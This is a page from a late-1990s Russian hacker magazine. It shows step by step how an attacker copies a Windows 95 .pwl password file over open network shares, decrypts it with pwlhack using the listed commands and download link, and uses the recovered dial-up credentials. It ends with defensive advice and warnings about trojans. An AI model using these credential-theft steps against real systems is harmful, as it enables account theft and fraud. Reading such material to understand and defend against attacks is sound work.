Спецвыпуск хакер, номер #001, стр. 001-096-2, Ты должен знать, как тебя хакают!

ЖУРНАЛ ХАКЕР

Ты должен знать, как тебя хакают!

Jaguar

Спецвыпуск хакер, номер #001, стр. 001-096-2

Том в устройстве Е не имеет метки

Серийный номер тома: 2247-15D0

Содержимое каталога Е:\

WIN95 <КАТАЛОГ> 11-30-98 6:48p WIN95

0 файл(а,ов) 0 байт

1 каталог(а,ов) 287,997,952 байт свободно

Дальше следуют команды:

E:\>cd win95

E:\WIN95>dir *.pwl

Том в устройстве Е не имеет метки

Серийный номер тома: 2247-15D0

Содержимое каталога Е:\WIN95

ANDREY PWL 730 02-05-99 10:31p ANDREY.PWL

1 файл(а,ов) 730 байт

0 каталог(а,ов) 287,997,952 байт свободно

E:\WIN95>copy andrey.pwl c:\hacking\pwlhack

Теперь, после копирования файла с расширением .pwl, хакеру нужно отсоединиться от этого компьютера. Он открывает иконку «Мой компьютер», выбирает иконку E:\121.31.21.87\C, нажав правую кнопку мыши. Там жмет «Отсоединить». Что теперь? А теперь он берет программу pwlhack (http://newdata2.box.sk/neworder /crackpwd/pwlhck32.rar) и с помощью нее расшифровывает добытый файл andrey.pwl.

C:\HACKING\PWLHACK>pwlhack.exe /list andrey.pwl andrey

Enter the password:

File ‘ANDREY.PWL’ has size 730 bytes,

version [NEW_Win95_OSR/2]

for user ‘ANDREY’ with password ‘’ contains:

[Type]-[The resource location string]

[Password]-

Dial X *Rna\Соединение с lamerishe\L5tRe fsa3Xfa12

Indexed Entryes: 1; Number of resources: 1.

Настает кульминационный момент! Итак, теперь с помощью аккаунта, добытого у «чайника», хакер может лазить по просторам всемирной паутины Интернет. А вот и сам аккаунт:

Имя пользователя: L5tRe

Пароль: fsa3Xfa12

Если у данного провайдера можно посмотреть статистику прямо из Интернета, то обычно хакеры посещают сайт провайдера (в нашем примере www.lamerishe.ru) и смотрят, сколько осталось денег на счету у пользователя и в какое время он обычно находится в Интернете. Кстати, телефоны модемных пулов также можно узнать на сайте у провайдера. :)

Существует еще несколько иных способов, таких как использование троянов Netbus1.0, Netbus Pro 2.0, BackOrifice и т.д. Самый простой из всех способов заключается в том, что, зная IP-адрес с открытыми сетевыми ресурсами, можно соединиться с компьютером, нажав на Пуск, выбрав «Поиск компьютера» и указав IP-адрес.

«Все. Систему я понял. Теперь объясни-ка мне, как устранить лазейку и защитить себя от непрошеных гостей?» — скажешь ты. Хорошо. Для защиты от описанной выше дырки тебе будет необходимо отключить привязку (службу доступа к файлам и принтерам) от контроллера удаленного доступа (лезь в «Панель управления» -> «Сеть»), а в Windows NT нужно запретить службу Server в Remote Access WAN Wrapper. Но от НетБаса, БэкОрифиса и подобных троянов это тебя не спасет. А вот чтобы не подхватить трояна, во-первых, никогда не подпускай никого к своему компьютеру со всякими дискетками, а, во-вторых, никогда не запускай у себя на компе никаких прог, в которых ты хоть на грамм сомневаешься. Последним хакерским способом по рассылке троянов был массовый спамминг с хоста microsoft.com, где в каждом письме лежал якобы патч к 4-му IE. Ну а что этот «патч» делал, я думаю, ты уже догадался. :)

Назад на стр. 001-096-1 Содержание